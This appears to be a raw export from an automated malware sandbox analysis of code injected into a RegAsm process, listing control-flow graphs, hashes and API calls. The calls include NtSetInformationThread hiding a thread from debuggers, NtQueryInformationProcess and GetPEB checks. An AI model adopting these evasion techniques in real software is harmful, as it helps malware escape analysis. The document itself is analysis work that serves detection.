                                  control_flow_graph 394 c30631-c30a34 395 c30a3c-c30ae6 call c381cf call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 394->395 396 c30a37 call c381cf 394->396 410 c30aeb-c30b00 395->410 396->395 411 c30b06-c30b2c call c38314 410->411 412 c33189-c331e1 call c33e58 410->412 411->410 417 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 411->417 418 c331e6-c335ed 412->418 419 c331e1 call c33e58 412->419 449 c30b8b-c30bf3 call c381cf call c39eee 417->449 450 c31078-c310d8 call c381cf * 2 call c39eee 417->450 422 c335f3-c33620 call c39eee 418->422 423 c3452b-c34534 418->423 419->418 434 c33df6-c33e51 call c39eee * 4 422->434 435 c33626-c33726 call c33fdf call c37d70 call c39eee 422->435 425 c34535-c3454c 423->425 425->425 428 c3454e-c345a2 425->428 435->434 461 c3372c-c33767 call c39eee 435->461 449->450 468 c30bf9-c30c05 449->468 482 c38a84-c38f11 call c38799 call c38ab5 450->482 483 c310de-c310e8 call c37ce8 450->483 461->434 470 c3376d-c337cc call c39eee 461->470 471 c30c0b-c30c2a call c382c4 468->471 470->434 479 c337d2-c337d7 470->479 480 c30c51-c30c56 471->480 481 c30c2c-c30c35 471->481 479->434 485 c337dd-c33825 call c337f9 479->485 480->482 488 c30c5c-c31053 480->488 481->482 486 c30c3b-c30c40 481->486 497 c3110b-c31111 483->497 498 c310ea 483->498 508 c33827-c3382c 485->508 509 c33834-c33840 485->509 486->482 491 c30c46-c30c4b 486->491 488->482 494 c31059-c3105e 488->494 491->480 491->482 494->482 500 c31064-c31069 494->500 503 c31117-c31143 call c31864 call c37d70 call c317bf 497->503 504 c311af-c311b9 497->504 499 c310f4-c310fe call c33189 498->499 523 c31100-c31104 499->523 500->482 506 c3106f-c31072 500->506 511 c3062c-c30a37 call c381cf 503->511 545 c31149-c3114d 503->545 510 c311bf-c311c4 504->510 504->511 506->450 506->471 508->434 516 c33832 508->516 509->434 517 c33841-c3388e call c38314 509->517 518 c311c6-c311ca 510->518 519 c311de-c311eb 510->519 511->395 
516->509 517->434 538 c33894-c33919 call c3452b call c338d6 517->538 520 c311d9 call c31d3f 518->520 521 c311cc-c311d7 call c31864 518->521 525 c35a43-c35a52 call c311f0 519->525 526 c340a3-c34108 call c39eee 519->526 520->519 521->519 521->520 523->526 541 c35a56 525->541 542 c35abf-c35ac6 call c352b9 525->542 538->434 569 c3391f-c33957 call c39eee 538->569 546 c35a58-c35a7f 541->546 547 c35abd-c35abe 541->547 554 c35b31-c35f1a 542->554 555 c35ac8-c35ae3 542->555 545->504 551 c3114f-c311ae call c3949d call c31719 call c31dbc 545->551 557 c35a82-c35aac 546->557 558 c35ae7-c35aee 546->558 547->542 551->504 561 c35ae4 555->561 557->561 570 c35aae-c35ac6 call c35200 557->570 563 c35af0-c35b1e 558->563 564 c35b1f-c35b2c 558->564 561->558 563->564 564->554 569->434 577 c3395d-c33d99 call c39eee 569->577 570->554 570->555 577->434 582 c33d9b-c33dd3 call c39eee * 2 577->582
                                  APIs
                                    • Part of subcall function 00C381CF: LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction ID: af40867200b41dcca47869dce27590a3529cd58d69e7a1e98ca2d87bda4683b4
                                  • Opcode Fuzzy Hash: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction Fuzzy Hash: E2E1CE93E2E6147FA6A05D29E8E279FA2D24750300FB8D1099E119F78DE7ACFC4643C1
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
control_flow_graph 587 c311f0-c31228 call c39447 590 c3122e-c3122f 587->590 591 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 587->591 593 c31235-c3125a call c3521f 590->593 625 c30aeb-c30b00 591->625 599 c31260-c3168a call c393ed 593->599 600 c31696-c316b1 call c316be 593->600 599->591 611 c31690-c31691 call c31e6c 599->611 600->593 613 c340a3-c34108 call c39eee 600->613 611->600 626 c30b06-c30b2c call c38314 625->626 627 c33189-c331e1 call c33e58 625->627 626->625 632 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 626->632 633 c331e6-c335ed 627->633 634 c331e1 call c33e58 627->634 664 c30b8b-c30bf3 call c381cf call c39eee 632->664 665 c31078-c310d8 call c381cf * 2 call c39eee 632->665 637 c335f3-c33620 call c39eee 633->637 638 c3452b-c34534 633->638 634->633 649 c33df6-c33e51 call c39eee * 4 637->649 650 c33626-c33726 call c33fdf call c37d70 call c39eee 637->650 640 c34535-c3454c 638->640 640->640 643 c3454e-c345a2 640->643 650->649 676 c3372c-c33767 call c39eee 650->676 664->665 683 c30bf9-c30c05 664->683 697 c38a84-c38f11 call c38799 call c38ab5 665->697 698 c310de-c310e8 call c37ce8 665->698 676->649 685 c3376d-c337cc call c39eee 676->685 686 c30c0b-c30c2a call c382c4 683->686 685->649 694 c337d2-c337d7 685->694 695 c30c51-c30c56 686->695 696 c30c2c-c30c35 686->696 694->649 700 c337dd-c33825 call c337f9 694->700 695->697 703 c30c5c-c31053 695->703 696->697 701 c30c3b-c30c40 696->701 712 c3110b-c31111 698->712 713 c310ea 698->713 723 c33827-c3382c 700->723 724 c33834-c33840 700->724 701->697 706 c30c46-c30c4b 701->706 703->697 709 c31059-c3105e 703->709 706->695 706->697 709->697 715 c31064-c31069 709->715 718 c31117-c31143 call c31864 call c37d70 call c317bf 712->718 719 c311af-c311b9 712->719 714 c310f4-c310fe call c33189 713->714 736 c31100-c31104 714->736 715->697 721 c3106f-c31072 715->721 718->591 753 c31149-c3114d 718->753 719->591 725 c311bf-c311c4 719->725 721->665 721->686 723->649 729 c33832 723->729 724->649 730 c33841-c3388e call c38314 724->730 731 c311c6-c311ca 725->731 732 c311de-c311eb 725->732 729->724 730->649 747 c33894-c33919 call c3452b call c338d6 730->747 733 c311d9 call c31d3f 731->733 734 c311cc-c311d7 call c31864 731->734 732->613 737 c35a43-c35a52 call c311f0 732->737 733->732 734->732 734->733 736->613 749 c35a56 737->749 750 c35abf-c35ac6 call c352b9 737->750 747->649 777 c3391f-c33957 call c39eee 747->777 754 c35a58-c35a7f 749->754 755 c35abd-c35abe 749->755 762 c35b31-c35f1a 750->762 763 c35ac8-c35ae3 750->763 753->719 759 c3114f-c311ae call c3949d call c31719 call c31dbc 753->759 765 c35a82-c35aac 754->765 766 c35ae7-c35aee 754->766 755->750 759->719 769 c35ae4 763->769 765->769 778 c35aae-c35ac6 call c35200 765->778 771 c35af0-c35b1e 766->771 772 c35b1f-c35b2c 766->772 769->766 771->772 772->762 777->649 785 c3395d-c33d99 call c39eee 777->785 778->762 778->763 785->649 790 c33d9b-c33dd3 call c39eee * 2 785->790
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction ID: 8725311e67224f41c09769ce1c7c7548cefe4f3dc66020448b966db7601fd2c4
                                  • Opcode Fuzzy Hash: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction Fuzzy Hash: F2918C70B60305AFEF346EA48CE2BDE3752AF42750F680116FD559B1C1CF75C98A9A12
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
control_flow_graph 795 c31719-c3176f call c39eee * 2 800 c31775-c317ba call c39eee * 2 795->800 801 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 795->801 811 c340a3-c34108 call c39eee 800->811 826 c30aeb-c30b00 801->826 827 c30b06-c30b2c call c38314 826->827 828 c33189-c331e1 call c33e58 826->828 827->826 833 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 827->833 834 c331e6-c335ed 828->834 835 c331e1 call c33e58 828->835 865 c30b8b-c30bf3 call c381cf call c39eee 833->865 866 c31078-c310d8 call c381cf * 2 call c39eee 833->866 838 c335f3-c33620 call c39eee 834->838 839 c3452b-c34534 834->839 835->834 850 c33df6-c33e51 call c39eee * 4 838->850 851 c33626-c33726 call c33fdf call c37d70 call c39eee 838->851 841 c34535-c3454c 839->841 841->841 844 c3454e-c345a2 841->844 851->850 877 c3372c-c33767 call c39eee 851->877 865->866 884 c30bf9-c30c05 865->884 898 c38a84-c38f11 call c38799 call c38ab5 866->898 899 c310de-c310e8 call c37ce8 866->899 877->850 886 c3376d-c337cc call c39eee 877->886 887 c30c0b-c30c2a call c382c4 884->887 886->850 895 c337d2-c337d7 886->895 896 c30c51-c30c56 887->896 897 c30c2c-c30c35 887->897 895->850 901 c337dd-c33825 call c337f9 895->901 896->898 904 c30c5c-c31053 896->904 897->898 902 c30c3b-c30c40 897->902 913 c3110b-c31111 899->913 914 c310ea 899->914 924 c33827-c3382c 901->924 925 c33834-c33840 901->925 902->898 907 c30c46-c30c4b 902->907 904->898 910 c31059-c3105e 904->910 907->896 907->898 910->898 916 c31064-c31069 910->916 919 c31117-c31143 call c31864 call c37d70 call c317bf 913->919 920 c311af-c311b9 913->920 915 c310f4-c310fe call c33189 914->915 937 c31100-c31104 915->937 916->898 922 c3106f-c31072 916->922 919->801 954 c31149-c3114d 919->954 920->801 926 c311bf-c311c4 920->926 922->866 922->887 924->850 930 c33832 924->930 925->850 931 c33841-c3388e call c38314 925->931 932 c311c6-c311ca 926->932 933 c311de-c311eb 926->933 930->925 931->850 948 c33894-c33919 call c3452b call c338d6 931->948 934 c311d9 call c31d3f 932->934 935 c311cc-c311d7 call c31864 932->935 933->811 938 c35a43-c35a52 call c311f0 933->938 934->933 935->933 935->934 937->811 950 c35a56 938->950 951 c35abf-c35ac6 call c352b9 938->951 948->850 978 c3391f-c33957 call c39eee 948->978 955 c35a58-c35a7f 950->955 956 c35abd-c35abe 950->956 963 c35b31-c35f1a 951->963 964 c35ac8-c35ae3 951->964 954->920 960 c3114f-c311ae call c3949d call c31719 call c31dbc 954->960 966 c35a82-c35aac 955->966 967 c35ae7-c35aee 955->967 956->951 960->920 970 c35ae4 964->970 966->970 979 c35aae-c35ac6 call c35200 966->979 972 c35af0-c35b1e 967->972 973 c35b1f-c35b2c 967->973 970->967 972->973 973->963 978->850 986 c3395d-c33d99 call c39eee 978->986 979->963 979->964 986->850 991 c33d9b-c33dd3 call c39eee * 2 986->991
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction ID: 9d6896cad66a5ddd1f342968c2ff863b879b01875dcb12f6df0cc32e24cee477
                                  • Opcode Fuzzy Hash: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction Fuzzy Hash: 1C919B30B60305AFFF306E649C96BDE3652AF82750F68012AFD44AB1C1CFB5DD8A9611
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
control_flow_graph 996 c30629 997 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 996->997 1014 c30aeb-c30b00 997->1014 1015 c30b06-c30b2c call c38314 1014->1015 1016 c33189-c331e1 call c33e58 1014->1016 1015->1014 1021 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1015->1021 1022 c331e6-c335ed 1016->1022 1023 c331e1 call c33e58 1016->1023 1053 c30b8b-c30bf3 call c381cf call c39eee 1021->1053 1054 c31078-c310d8 call c381cf * 2 call c39eee 1021->1054 1026 c335f3-c33620 call c39eee 1022->1026 1027 c3452b-c34534 1022->1027 1023->1022 1038 c33df6-c33e51 call c39eee * 4 1026->1038 1039 c33626-c33726 call c33fdf call c37d70 call c39eee 1026->1039 1029 c34535-c3454c 1027->1029 1029->1029 1032 c3454e-c345a2 1029->1032 1039->1038 1065 c3372c-c33767 call c39eee 1039->1065 1053->1054 1072 c30bf9-c30c05 1053->1072 1086 c38a84-c38f11 call c38799 call c38ab5 1054->1086 1087 c310de-c310e8 call c37ce8 1054->1087 1065->1038 1074 c3376d-c337cc call c39eee 1065->1074 1075 c30c0b-c30c2a call c382c4 1072->1075 1074->1038 1083 c337d2-c337d7 1074->1083 1084 c30c51-c30c56 1075->1084 1085 c30c2c-c30c35 1075->1085 1083->1038 1089 c337dd-c33825 call c337f9 1083->1089 1084->1086 1092 c30c5c-c31053 1084->1092 1085->1086 1090 c30c3b-c30c40 1085->1090 1101 c3110b-c31111 1087->1101 1102 c310ea 1087->1102 1112 c33827-c3382c 1089->1112 1113 c33834-c33840 1089->1113 1090->1086 1095 c30c46-c30c4b 1090->1095 1092->1086 1098 c31059-c3105e 1092->1098 1095->1084 1095->1086 1098->1086 1104 c31064-c31069 1098->1104 1107 c31117-c31143 call c31864 call c37d70 call c317bf 1101->1107 1108 c311af-c311b9 1101->1108 1103 c310f4-c310fe call c33189 1102->1103 1125 c31100-c31104 1103->1125 1104->1086 1110 c3106f-c31072 1104->1110 1107->997 1146 c31149-c3114d 1107->1146 1108->997 1114 c311bf-c311c4 1108->1114 1110->1054 1110->1075 1112->1038 1118 c33832 1112->1118 1113->1038 1119 c33841-c3388e call c38314 1113->1119 1120 c311c6-c311ca 1114->1120 1121 c311de-c311eb 1114->1121 1118->1113 1119->1038 1139 c33894-c33919 call c3452b call c338d6 1119->1139 1122 c311d9 call c31d3f 1120->1122 1123 c311cc-c311d7 call c31864 1120->1123 1126 c35a43-c35a52 call c311f0 1121->1126 1127 c340a3-c34108 call c39eee 1121->1127 1122->1121 1123->1121 1123->1122 1125->1127 1142 c35a56 1126->1142 1143 c35abf-c35ac6 call c352b9 1126->1143 1139->1038 1170 c3391f-c33957 call c39eee 1139->1170 1147 c35a58-c35a7f 1142->1147 1148 c35abd-c35abe 1142->1148 1155 c35b31-c35f1a 1143->1155 1156 c35ac8-c35ae3 1143->1156 1146->1108 1152 c3114f-c311ae call c3949d call c31719 call c31dbc 1146->1152 1158 c35a82-c35aac 1147->1158 1159 c35ae7-c35aee 1147->1159 1148->1143 1152->1108 1162 c35ae4 1156->1162 1158->1162 1171 c35aae-c35ac6 call c35200 1158->1171 1164 c35af0-c35b1e 1159->1164 1165 c35b1f-c35b2c 1159->1165 1162->1159 1164->1165 1165->1155 1170->1038 1178 c3395d-c33d99 call c39eee 1170->1178 1171->1155 1171->1156 1178->1038 1183 c33d9b-c33dd3 call c39eee * 2 1178->1183
                                  APIs
                                    • Part of subcall function 00C381CF: LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction ID: 60f95ca0ca26b6c9d97d37373684535416c1673de6e1592d637491a9739d5120
                                  • Opcode Fuzzy Hash: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction Fuzzy Hash: C661CE70B60305AFFF346E649CE2BDE2652AF42750F68012AFC45971C1CFB4C98E9612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
control_flow_graph 1188 c30a7a-c30a7c 1189 c30a87-c30ae6 call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 1188->1189 1190 c30a7e-c30a82 1188->1190 1199 c30aeb-c30b00 1189->1199 1190->1189 1200 c30b06-c30b2c call c38314 1199->1200 1201 c33189-c331e1 call c33e58 1199->1201 1200->1199 1206 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1200->1206 1207 c331e6-c335ed 1201->1207 1208 c331e1 call c33e58 1201->1208 1238 c30b8b-c30bf3 call c381cf call c39eee 1206->1238 1239 c31078-c310d8 call c381cf * 2 call c39eee 1206->1239 1211 c335f3-c33620 call c39eee 1207->1211 1212 c3452b-c34534 1207->1212 1208->1207 1223 c33df6-c33e51 call c39eee * 4 1211->1223 1224 c33626-c33726 call c33fdf call c37d70 call c39eee 1211->1224 1214 c34535-c3454c 1212->1214 1214->1214 1217 c3454e-c345a2 1214->1217 1224->1223 1250 c3372c-c33767 call c39eee 1224->1250 1238->1239 1257 c30bf9-c30c05 1238->1257 1271 c38a84-c38f11 call c38799 call c38ab5 1239->1271 1272 c310de-c310e8 call c37ce8 1239->1272 1250->1223 1259 c3376d-c337cc call c39eee 1250->1259 1260 c30c0b-c30c2a call c382c4 1257->1260 1259->1223 1268 c337d2-c337d7 1259->1268 1269 c30c51-c30c56 1260->1269 1270 c30c2c-c30c35 1260->1270 1268->1223 1274 c337dd-c33825 call c337f9 1268->1274 1269->1271 1277 c30c5c-c31053 1269->1277 1270->1271 1275 c30c3b-c30c40 1270->1275 1286 c3110b-c31111 1272->1286 1287 c310ea 1272->1287 1297 c33827-c3382c 1274->1297 1298 c33834-c33840 1274->1298 1275->1271 1280 c30c46-c30c4b 1275->1280 1277->1271 1283 c31059-c3105e 1277->1283 1280->1269 1280->1271 1283->1271 1289 c31064-c31069 1283->1289 1292 c31117-c31143 call c31864 call c37d70 call c317bf 1286->1292 1293 c311af-c311b9 1286->1293 1288 c310f4-c310fe call c33189 1287->1288 1312 c31100-c31104 1288->1312 1289->1271 1295 c3106f-c31072 1289->1295 1300 c3062c-c30a69 call c381cf * 2 call c345aa 1292->1300 1337 c31149-c3114d 1292->1337 1299 c311bf-c311c4 1293->1299 1293->1300 1295->1239 1295->1260 1297->1223 1305 c33832 1297->1305 1298->1223 1306 c33841-c3388e call c38314 1298->1306 1307 c311c6-c311ca 1299->1307 1308 c311de-c311eb 1299->1308 1300->1189 1305->1298 1306->1223 1329 c33894-c33919 call c3452b call c338d6 1306->1329 1309 c311d9 call c31d3f 1307->1309 1310 c311cc-c311d7 call c31864 1307->1310 1314 c35a43-c35a52 call c311f0 1308->1314 1315 c340a3-c34108 call c39eee 1308->1315 1309->1308 1310->1308 1310->1309 1312->1315 1333 c35a56 1314->1333 1334 c35abf-c35ac6 call c352b9 1314->1334 1329->1223 1363 c3391f-c33957 call c39eee 1329->1363 1339 c35a58-c35a7f 1333->1339 1340 c35abd-c35abe 1333->1340 1348 c35b31-c35f1a 1334->1348 1349 c35ac8-c35ae3 1334->1349 1337->1293 1344 c3114f-c311ae call c3949d call c31719 call c31dbc 1337->1344 1351 c35a82-c35aac 1339->1351 1352 c35ae7-c35aee 1339->1352 1340->1334 1344->1293 1355 c35ae4 1349->1355 1351->1355 1364 c35aae-c35ac6 call c35200 1351->1364 1357 c35af0-c35b1e 1352->1357 1358 c35b1f-c35b2c 1352->1358 1355->1352 1357->1358 1358->1348 1363->1223 1371 c3395d-c33d99 call c39eee 1363->1371 1364->1348 1364->1349 1371->1223 1376 c33d9b-c33dd3 call c39eee * 2 1371->1376
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                    • Part of subcall function 00C381CF: LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction ID: 80d84bc7e909577d50205b818e3f5e829037a9c2ad6fa7ac0efbcba7f2ed47ab
                                  • Opcode Fuzzy Hash: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction Fuzzy Hash: 4551BA30B60305AFFF3429649CE6BDE2712AF42750F68012AFD549B1C1CFB4D98E9612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
control_flow_graph 1381 c39ef3-c39ef7 1382 c39ef8-c39f07 1381->1382 1382->1382 1383 c39f09-c3a709 call c38fc5 1382->1383 1388 c3a709 1383->1388 1389 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 1383->1389 1388->1389 1391 c3a70f-c3a715 1388->1391 1423 c30aeb-c30b00 1389->1423 1392 c3a71a-c3a721 1391->1392 1392->1392 1394 c3a723-c3a736 1392->1394 1396 c3a73b-c3a743 1394->1396 1396->1396 1398 c3a745-c3a769 1396->1398 1403 c3a7f4-c3a803 1398->1403 1404 c3a76f-c3a779 1398->1404 1404->1403 1406 c3a77b-c3a77f 1404->1406 1406->1403 1408 c3a781-c3a787 1406->1408 1408->1403 1410 c3a789-c3a78d 1408->1410 1410->1403 1412 c3a78f-c3a793 1410->1412 1412->1403 1414 c3a795-c3a799 1412->1414 1414->1403 1416 c3a79b-c3a7ab 1414->1416 1416->1389 1419 c3a7b1-c3a7bf 1416->1419 1419->1403 1420 c3a7c1-c3a7c9 1419->1420 1420->1403 1422 c3a7cb-c3a7d6 1420->1422 1422->1403 1424 c3a7d8-c3a7dd NtQueryInformationProcess 1422->1424 1425 c30b06-c30b2c call c38314 1423->1425 1426 c33189-c331e1 call c33e58 1423->1426 1429 c3a7e0-c3a7e8 1424->1429 1425->1423 1433 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1425->1433 1434 c331e6-c335ed 1426->1434 1435 c331e1 call c33e58 1426->1435 1429->1429 1432 c3a7ea-c3a825 1429->1432 1442 c3a827 1432->1442 1443 c3a7cf-c3a7d6 1432->1443 1468 c30b8b-c30bf3 call c381cf call c39eee 1433->1468 1469 c31078-c310d8 call c381cf * 2 call c39eee 1433->1469 1439 c335f3-c33620 call c39eee 1434->1439 1440 c3452b-c34534 1434->1440 1435->1434 1453 c33df6-c33e51 call c39eee * 4 1439->1453 1454 c33626-c33726 call c33fdf call c37d70 call c39eee 1439->1454 1444 c34535-c3454c 1440->1444 1442->1442 1443->1403 1443->1424 1444->1444 1447 c3454e-c345a2 1444->1447 1454->1453 1480 c3372c-c33767 call c39eee 1454->1480 1468->1469 1487 c30bf9-c30c05 1468->1487 1501 c38a84-c38f11 call c38799 call c38ab5 1469->1501 1502 c310de-c310e8 call c37ce8 1469->1502 1480->1453 1489 c3376d-c337cc call c39eee 1480->1489 1490 c30c0b-c30c2a call c382c4 1487->1490 1489->1453 1498 c337d2-c337d7 1489->1498 1499 c30c51-c30c56 1490->1499 1500 c30c2c-c30c35 1490->1500 1498->1453 1504 c337dd-c33825 call c337f9 1498->1504 1499->1501 1507 c30c5c-c31053 1499->1507 1500->1501 1505 c30c3b-c30c40 1500->1505 1516 c3110b-c31111 1502->1516 1517 c310ea 1502->1517 1527 c33827-c3382c 1504->1527 1528 c33834-c33840 1504->1528 1505->1501 1510 c30c46-c30c4b 1505->1510 1507->1501 1513 c31059-c3105e 1507->1513 1510->1499 1510->1501 1513->1501 1519 c31064-c31069 1513->1519 1522 c31117-c31143 call c31864 call c37d70 call c317bf 1516->1522 1523 c311af-c311b9 1516->1523 1518 c310f4-c310fe call c33189 1517->1518 1540 c31100-c31104 1518->1540 1519->1501 1525 c3106f-c31072 1519->1525 1522->1389 1561 c31149-c3114d 1522->1561 1523->1389 1529 c311bf-c311c4 1523->1529 1525->1469 1525->1490 1527->1453 1533 c33832 1527->1533 1528->1453 1534 c33841-c3388e call c38314 1528->1534 1535 c311c6-c311ca 1529->1535 1536 c311de-c311eb 1529->1536 1533->1528 1534->1453 1554 c33894-c33919 call c3452b call c338d6 1534->1554 1537 c311d9 call c31d3f 1535->1537 1538 c311cc-c311d7 call c31864 1535->1538 1541 c35a43-c35a52 call c311f0 1536->1541 1542 c340a3-c34108 call c39eee 1536->1542 1537->1536 1538->1536 1538->1537 1540->1542 1557 c35a56 1541->1557 1558 c35abf-c35ac6 call c352b9 1541->1558 1554->1453 1585 c3391f-c33957 call c39eee 1554->1585 1562 c35a58-c35a7f 1557->1562 1563 c35abd-c35abe 1557->1563 1570 c35b31-c35f1a 1558->1570 1571 c35ac8-c35ae3 1558->1571 1561->1523 1567 c3114f-c311ae call c3949d call c31719 call c31dbc 1561->1567 1573 c35a82-c35aac 1562->1573 1574 c35ae7-c35aee 1562->1574 1563->1558 1567->1523 1577 c35ae4 1571->1577 1573->1577 1586 c35aae-c35ac6 call c35200 1573->1586 1579 c35af0-c35b1e 1574->1579 1580 c35b1f-c35b2c 1574->1580 1577->1574 1579->1580 1580->1570 1585->1453 1593 c3395d-c33d99 call c39eee 1585->1593 1586->1570 1586->1571 1593->1453 1598 c33d9b-c33dd3 call c39eee * 2 1593->1598
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction ID: 9089e07874a17f2e4cb0ada4272eb7746d856d2d8deca8d740abf0b2a6092e37
                                  • Opcode Fuzzy Hash: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction Fuzzy Hash: 83216B75B60305AFEF30BEA48D62BDD35D29F88760F704126FE416B2C4DA78D8825B05
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1603 c32a91-c32aa2 1604 c32aa5-c32aad 1603->1604 1604->1604 1605 c32aaf-c32b00 GetPEB call c39eee 1604->1605 1608 c32b06-c32b38 call c39eee Sleep 1605->1608 1609 c32a7c-c32a8a 1605->1609 1615 c32f6b-c32f82 TerminateThread 1608->1615 1616 c32b3e-c32b45 1608->1616 1610 c3a80b 1609->1610 1612 c3a810 1610->1612 1613 c3a80b call c32a91 1610->1613 1617 c3a815 1612->1617 1613->1612 1618 c34bb7 call c32b4a 1615->1618 1616->1618 1617->1617 1620 c34bbc-c34bcc call c38fc5 call c345aa 1618->1620 1625 c34bdb-c34c26 call c345aa 1620->1625 1626 c34bce-c34bd3 1620->1626 1625->1610 1625->1620 1626->1620
                                  APIs
                                  • Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000A810,00000000,00000000,00000000), ref: 00C32B2E
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
